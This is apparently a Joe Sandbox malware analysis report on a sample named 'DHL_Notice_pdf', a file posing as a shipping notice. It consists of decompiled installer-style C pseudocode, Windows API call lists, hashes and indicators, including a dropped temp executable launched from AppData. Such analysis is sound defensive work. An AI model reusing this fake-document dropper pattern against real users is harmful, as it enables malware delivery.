                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004061DB(void* _a4, void* _a8, long _a12) {
                                                            				int _t7;
                                                            				long _t11;
                                                            
                                                            				_t11 = _a12;
                                                            				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                            					return 0;
                                                            				} else {
                                                            					return 1;
                                                            				}
                                                            			}






                                                            APIs
                                                            • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004035F8(long _a4) {
                                                            				long _t2;
                                                            
                                                            				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                            				return _t2;
                                                            			}





                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E00401FA4() {
                                                            				void* _t9;
                                                            				char _t13;
                                                            				void* _t15;
                                                            				void* _t17;
                                                            				void* _t20;
                                                            				void* _t22;
                                                            
                                                            				_t19 = E00402DA6(_t15);
                                                            				E004056CA(0xffffffeb, _t7);
                                                            				_t9 = E00405C4B(_t19); // executed
                                                            				_t20 = _t9;
                                                            				if(_t20 == _t15) {
                                                            					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                            				} else {
                                                            					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                            						_t13 = E00406AE0(_t17, _t20); // executed
                                                            						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                            							if(_t13 != _t15) {
                                                            								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                            							}
                                                            						} else {
                                                            							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                            						}
                                                            					}
                                                            					_push(_t20);
                                                            					CloseHandle();
                                                            				}
                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
                                                            				return 0;
                                                            			}

                                                            APIs
                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                              • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                              • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                              • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                              • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                              • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                            • String ID:
                                                            • API String ID: 2972824698-0
                                                            • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                            • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                            • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                            • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                            				struct HWND__* _v8;
                                                            				long _v12;
                                                            				struct tagRECT _v28;
                                                            				void* _v36;
                                                            				signed int _v40;
                                                            				int _v44;
                                                            				int _v48;
                                                            				signed int _v52;
                                                            				int _v56;
                                                            				void* _v60;
                                                            				void* _v68;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				struct HWND__* _t94;
                                                            				long _t95;
                                                            				int _t100;
                                                            				void* _t108;
                                                            				intOrPtr _t130;
                                                            				struct HWND__* _t134;
                                                            				int _t156;
                                                            				int _t159;
                                                            				struct HMENU__* _t164;
                                                            				struct HWND__* _t168;
                                                            				struct HWND__* _t169;
                                                            				int _t171;
                                                            				void* _t172;
                                                            				short* _t173;
                                                            				short* _t175;
                                                            				int _t177;
                                                            
                                                            				_t169 =  *0x429244;
                                                            				_t156 = 0;
                                                            				_v8 = _t169;
                                                            				if(_a8 != 0x110) {
                                                            					if(_a8 == 0x405) {
                                                            						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                            					}
                                                            					if(_a8 != 0x111) {
                                                            						L17:
                                                            						_t171 = 1;
                                                            						if(_a8 != 0x404) {
                                                            							L25:
                                                            							if(_a8 != 0x7b) {
                                                            								goto L20;
                                                            							}
                                                            							_t94 = _v8;
                                                            							if(_a12 != _t94) {
                                                            								goto L20;
                                                            							}
                                                            							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                            							_a8 = _t95;
                                                            							if(_t95 <= _t156) {
                                                            								L36:
                                                            								return 0;
                                                            							}
                                                            							_t164 = CreatePopupMenu();
                                                            							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                            							_t100 = _a16;
                                                            							_t159 = _a16 >> 0x10;
                                                            							if(_a16 == 0xffffffff) {
                                                            								GetWindowRect(_v8,  &_v28);
                                                            								_t100 = _v28.left;
                                                            								_t159 = _v28.top;
                                                            							}
                                                            							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                            								_v60 = _t156;
                                                            								_v48 = 0x423748;
                                                            								_v44 = 0x1000;
                                                            								_a4 = _a8;
                                                            								do {
                                                            									_a4 = _a4 - 1;
                                                            									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                            								} while (_a4 != _t156);
                                                            								OpenClipboard(_t156);
                                                            								EmptyClipboard();
                                                            								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                            								_a4 = _t108;
                                                            								_t172 = GlobalLock(_t108);
                                                            								do {
                                                            									_v48 = _t172;
                                                            									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                            									 *_t173 = 0xd;
                                                            									_t175 = _t173 + 2;
                                                            									 *_t175 = 0xa;
                                                            									_t172 = _t175 + 2;
                                                            									_t156 = _t156 + 1;
                                                            								} while (_t156 < _a8);
                                                            								GlobalUnlock(_a4);
                                                            								SetClipboardData(0xd, _a4);
                                                            								CloseClipboard();
                                                            							}
                                                            							goto L36;
                                                            						}
                                                            						if( *0x42922c == _t156) {
                                                            							ShowWindow( *0x42a268, 8);
                                                            							if( *0x42a2ec == _t156) {
                                                            								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
                                                            							}
                                                            							E0040459D(_t171);
                                                            							goto L25;
                                                            						}
                                                            						 *0x421f18 = 2;
                                                            						E0040459D(0x78);
                                                            						goto L20;
                                                            					} else {
                                                            						if(_a12 != 0x403) {
                                                            							L20:
                                                            							return E0040462B(_a8, _a12, _a16);
                                                            						}
                                                            						ShowWindow( *0x429230, _t156);
                                                            						ShowWindow(_t169, 8);
                                                            						E004045F9(_t169);
                                                            						goto L17;
                                                            					}
                                                            				}
                                                            				_v52 = _v52 | 0xffffffff;
                                                            				_v40 = _v40 | 0xffffffff;
                                                            				_t177 = 2;
                                                            				_v60 = _t177;
                                                            				_v56 = 0;
                                                            				_v48 = 0;
                                                            				_v44 = 0;
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				_t130 =  *0x42a270;
                                                            				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                            				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                            				 *0x429230 = GetDlgItem(_a4, 0x403);
                                                            				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                                                            				_t134 = GetDlgItem(_a4, 0x3f8);
                                                            				 *0x429244 = _t134;
                                                            				_v8 = _t134;
                                                            				E004045F9( *0x429230);
                                                            				 *0x429234 = E00404F52(4);
                                                            				 *0x42924c = 0;
                                                            				GetClientRect(_v8,  &_v28);
                                                            				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                            				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                                            				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                                            				if(_a8 >= 0) {
                                                            					SendMessageW(_v8, 0x1001, 0, _a8);
                                                            					SendMessageW(_v8, 0x1026, 0, _a8);
                                                            				}
                                                            				if(_a12 >= _t156) {
                                                            					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                            				}
                                                            				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                            				_push(0x1b);
                                                            				E004045C4(_a4);
                                                            				if(( *0x42a278 & 0x00000003) != 0) {
                                                            					ShowWindow( *0x429230, _t156);
                                                            					if(( *0x42a278 & 0x00000002) != 0) {
                                                            						 *0x429230 = _t156;
                                                            					} else {
                                                            						ShowWindow(_v8, 8);
                                                            					}
                                                            					E004045F9( *0x429228);
                                                            				}
                                                            				_t168 = GetDlgItem(_a4, 0x3ec);
                                                            				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                            				if(( *0x42a278 & 0x00000004) != 0) {
                                                            					SendMessageW(_t168, 0x409, _t156, _a12);
                                                            					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                            				}
                                                            				goto L36;
                                                            			}

                                                            0x0040596a
                                                            0x0040597e
                                                            0x00405987
                                                            0x00405990
                                                            0x004059a0
                                                            0x004059ac
                                                            0x004059ac
                                                            0x00000000

                                                            APIs
                                                            • GetDlgItem.USER32 ref: 00405867
                                                            • GetDlgItem.USER32 ref: 00405876
                                                            • GetClientRect.USER32 ref: 004058B3
                                                            • GetSystemMetrics.USER32 ref: 004058BA
                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                            • ShowWindow.USER32(?,00000008), ref: 00405956
                                                            • GetDlgItem.USER32 ref: 00405977
                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                            • GetDlgItem.USER32 ref: 00405885
                                                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                            • GetDlgItem.USER32 ref: 004059C9
                                                            • CreateThread.KERNEL32 ref: 004059D7
                                                            • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                            • ShowWindow.USER32(00000000), ref: 00405A02
                                                            • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                            • ShowWindow.USER32(00000008), ref: 00405A51
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                            • CreatePopupMenu.USER32 ref: 00405A96
                                                            • AppendMenuW.USER32 ref: 00405AAA
                                                            • GetWindowRect.USER32 ref: 00405ACA
                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                            • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                            • EmptyClipboard.USER32 ref: 00405B31
                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                            • GlobalLock.KERNEL32 ref: 00405B47
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                            • SetClipboardData.USER32 ref: 00405B86
                                                            • CloseClipboard.USER32 ref: 00405B8C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                            • String ID: H7B${
                                                            • API String ID: 590372296-2256286769
                                                            • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                            • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                            • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                            • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				long _v16;
                                                            				long _v20;
                                                            				long _v24;
                                                            				char _v28;
                                                            				intOrPtr _v32;
                                                            				long _v36;
                                                            				char _v40;
                                                            				unsigned int _v44;
                                                            				signed int _v48;
                                                            				WCHAR* _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v64;
                                                            				intOrPtr _v68;
                                                            				WCHAR* _v72;
                                                            				void _v76;
                                                            				struct HWND__* _v80;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr _t82;
                                                            				long _t87;
                                                            				short* _t89;
                                                            				void* _t95;
                                                            				signed int _t96;
                                                            				int _t109;
                                                            				signed short _t114;
                                                            				signed int _t118;
                                                            				struct HWND__** _t122;
                                                            				intOrPtr* _t138;
                                                            				WCHAR* _t146;
                                                            				unsigned int _t150;
                                                            				signed int _t152;
                                                            				unsigned int _t156;
                                                            				signed int _t158;
                                                            				signed int* _t159;
                                                            				signed int* _t160;
                                                            				struct HWND__* _t166;
                                                            				struct HWND__* _t167;
                                                            				int _t169;
                                                            				unsigned int _t197;
                                                            
                                                            				_t156 = __edx;
                                                            				_t82 =  *0x422720;
                                                            				_v32 = _t82;
                                                            				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                                            				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                            				if(_a8 == 0x40b) {
                                                            					E00405CAC(0x3fb, _t146);
                                                            					E004068EF(_t146);
                                                            				}
                                                            				_t167 = _a4;
                                                            				if(_a8 != 0x110) {
                                                            					L8:
                                                            					if(_a8 != 0x111) {
                                                            						L20:
                                                            						if(_a8 == 0x40f) {
                                                            							L22:
                                                            							_v8 = _v8 & 0x00000000;
                                                            							_v12 = _v12 & 0x00000000;
                                                            							E00405CAC(0x3fb, _t146);
                                                            							if(E0040603F(_t186, _t146) == 0) {
                                                            								_v8 = 1;
                                                            							}
                                                            							E00406668(0x421718, _t146);
                                                            							_t87 = E00406A35(1);
                                                            							_v16 = _t87;
                                                            							if(_t87 == 0) {
                                                            								L30:
                                                            								E00406668(0x421718, _t146);
                                                            								_t89 = E00405FE2(0x421718);
                                                            								_t158 = 0;
                                                            								if(_t89 != 0) {
                                                            									 *_t89 = 0;
                                                            								}
                                                            								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                            									goto L35;
                                                            								} else {
                                                            									_t169 = 0x400;
                                                            									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                            									asm("cdq");
                                                            									_v48 = _t109;
                                                            									_v44 = _t156;
                                                            									_v12 = 1;
                                                            									goto L36;
                                                            								}
                                                            							} else {
                                                            								_t159 = 0;
                                                            								if(0 == 0x421718) {
                                                            									goto L30;
                                                            								} else {
                                                            									goto L26;
                                                            								}
                                                            								while(1) {
                                                            									L26:
                                                            									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                                                            									if(_t114 != 0) {
                                                            										break;
                                                            									}
                                                            									if(_t159 != 0) {
                                                            										 *_t159 =  *_t159 & _t114;
                                                            									}
                                                            									_t160 = E00405F83(0x421718);
                                                            									 *_t160 =  *_t160 & 0x00000000;
                                                            									_t159 = _t160;
                                                            									 *_t159 = 0x5c;
                                                            									if(_t159 != 0x421718) {
                                                            										continue;
                                                            									} else {
                                                            										goto L30;
                                                            									}
                                                            								}
                                                            								_t150 = _v44;
                                                            								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                            								_v44 = _t150 >> 0xa;
                                                            								_v12 = 1;
                                                            								_t158 = 0;
                                                            								__eflags = 0;
                                                            								L35:
                                                            								_t169 = 0x400;
                                                            								L36:
                                                            								_t95 = E00404F52(5);
                                                            								if(_v12 != _t158) {
                                                            									_t197 = _v44;
                                                            									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                            										_v8 = 2;
                                                            									}
                                                            								}
                                                            								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                                                            									E00404F3A(0x3ff, 0xfffffffb, _t95);
                                                            									if(_v12 == _t158) {
                                                            										SetDlgItemTextW(_a4, _t169, 0x421708);
                                                            									} else {
                                                            										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                                                            									}
                                                            								}
                                                            								_t96 = _v8;
                                                            								 *0x42a304 = _t96;
                                                            								if(_t96 == _t158) {
                                                            									_v8 = E0040140B(7);
                                                            								}
                                                            								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                            									_v8 = _t158;
                                                            								}
                                                            								E004045E6(0 | _v8 == _t158);
                                                            								if(_v8 == _t158 &&  *0x423738 == _t158) {
                                                            									E00404A0E();
                                                            								}
                                                            								 *0x423738 = _t158;
                                                            								goto L53;
                                                            							}
                                                            						}
                                                            						_t186 = _a8 - 0x405;
                                                            						if(_a8 != 0x405) {
                                                            							goto L53;
                                                            						}
                                                            						goto L22;
                                                            					}
                                                            					_t118 = _a12 & 0x0000ffff;
                                                            					if(_t118 != 0x3fb) {
                                                            						L12:
                                                            						if(_t118 == 0x3e9) {
                                                            							_t152 = 7;
                                                            							memset( &_v76, 0, _t152 << 2);
                                                            							_v80 = _t167;
                                                            							_v72 = 0x423748;
                                                            							_v60 = E00404E0B;
                                                            							_v56 = _t146;
                                                            							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                                                            							_t122 =  &_v80;
                                                            							_v64 = 0x41;
                                                            							__imp__SHBrowseForFolderW(_t122);
                                                            							if(_t122 == 0) {
                                                            								_a8 = 0x40f;
                                                            							} else {
                                                            								__imp__CoTaskMemFree(_t122);
                                                            								E00405F37(_t146);
                                                            								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                                                            								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Temp") {
                                                            									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                                                            									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                                                            										lstrcatW(_t146, 0x428200);
                                                            									}
                                                            								}
                                                            								 *0x423738 =  *0x423738 + 1;
                                                            								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                            							}
                                                            						}
                                                            						goto L20;
                                                            					}
                                                            					if(_a12 >> 0x10 != 0x300) {
                                                            						goto L53;
                                                            					}
                                                            					_a8 = 0x40f;
                                                            					goto L12;
                                                            				} else {
                                                            					_t166 = GetDlgItem(_t167, 0x3fb);
                                                            					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                                                            						E00405F37(_t146);
                                                            					}
                                                            					 *0x429238 = _t167;
                                                            					SetWindowTextW(_t166, _t146);
                                                            					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                            					_push(1);
                                                            					E004045C4(_t167);
                                                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                            					_push(0x14);
                                                            					E004045C4(_t167);
                                                            					E004045F9(_t166);
                                                            					_t138 = E00406A35(8);
                                                            					if(_t138 == 0) {
                                                            						L53:
                                                            						return E0040462B(_a8, _a12, _a16);
                                                            					} else {
                                                            						 *_t138(_t166, 1);
                                                            						goto L8;
                                                            					}
                                                            				}
                                                            			}













































                                                            0x00404d4a
                                                            0x00404d4a
                                                            0x00404d4f
                                                            0x00404d51
                                                            0x00404d59
                                                            0x00404d60
                                                            0x00404d62
                                                            0x00404d6d
                                                            0x00404d6d
                                                            0x00404d62
                                                            0x00404d7d
                                                            0x00404d87
                                                            0x00404d8f
                                                            0x00404daa
                                                            0x00404d91
                                                            0x00404d9a
                                                            0x00404d9a
                                                            0x00404d8f
                                                            0x00404daf
                                                            0x00404db4
                                                            0x00404db9
                                                            0x00404dc2
                                                            0x00404dc2
                                                            0x00404dcb
                                                            0x00404dcd
                                                            0x00404dcd
                                                            0x00404dd9
                                                            0x00404de1
                                                            0x00404deb
                                                            0x00404deb
                                                            0x00404df0
                                                            0x00000000
                                                            0x00404df0
                                                            0x00404c9a
                                                            0x00404c51
                                                            0x00404c58
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404c58
                                                            0x00404b77
                                                            0x00404b80
                                                            0x00404b9a
                                                            0x00404b9f
                                                            0x00404ba9
                                                            0x00404bb0
                                                            0x00404bbc
                                                            0x00404bbf
                                                            0x00404bc2
                                                            0x00404bc9
                                                            0x00404bd1
                                                            0x00404bd4
                                                            0x00404bd8
                                                            0x00404bdf
                                                            0x00404be7
                                                            0x00404c41
                                                            0x00404be9
                                                            0x00404bea
                                                            0x00404bf1
                                                            0x00404bfb
                                                            0x00404c03
                                                            0x00404c10
                                                            0x00404c24
                                                            0x00404c28
                                                            0x00404c28
                                                            0x00404c24
                                                            0x00404c2d
                                                            0x00404c3a
                                                            0x00404c3a
                                                            0x00404be7
                                                            0x00000000
                                                            0x00404b9f
                                                            0x00404b8d
                                                            0x00000000
                                                            0x00000000
                                                            0x00404b93
                                                            0x00000000
                                                            0x00404afe
                                                            0x00404b0b
                                                            0x00404b14
                                                            0x00404b21
                                                            0x00404b21
                                                            0x00404b28
                                                            0x00404b2e
                                                            0x00404b37
                                                            0x00404b3a
                                                            0x00404b3d
                                                            0x00404b45
                                                            0x00404b48
                                                            0x00404b4b
                                                            0x00404b51
                                                            0x00404b58
                                                            0x00404b5f
                                                            0x00404df6
                                                            0x00404e08
                                                            0x00404b65
                                                            0x00404b68
                                                            0x00000000
                                                            0x00404b68
                                                            0x00404b5f

                                                            APIs
                                                            • GetDlgItem.USER32 ref: 00404B04
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                            • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00423748,00000000,?,?), ref: 00404C1C
                                                            • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t), ref: 00404C28
                                                            • SetDlgItemTextW.USER32 ref: 00404C3A
                                                              • Part of subcall function 00405CAC: GetDlgItemTextW.USER32 ref: 00405CBF
                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                              • Part of subcall function 004068EF: CharPrevW.USER32(?,?,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                            • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                              • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                              • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                              • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
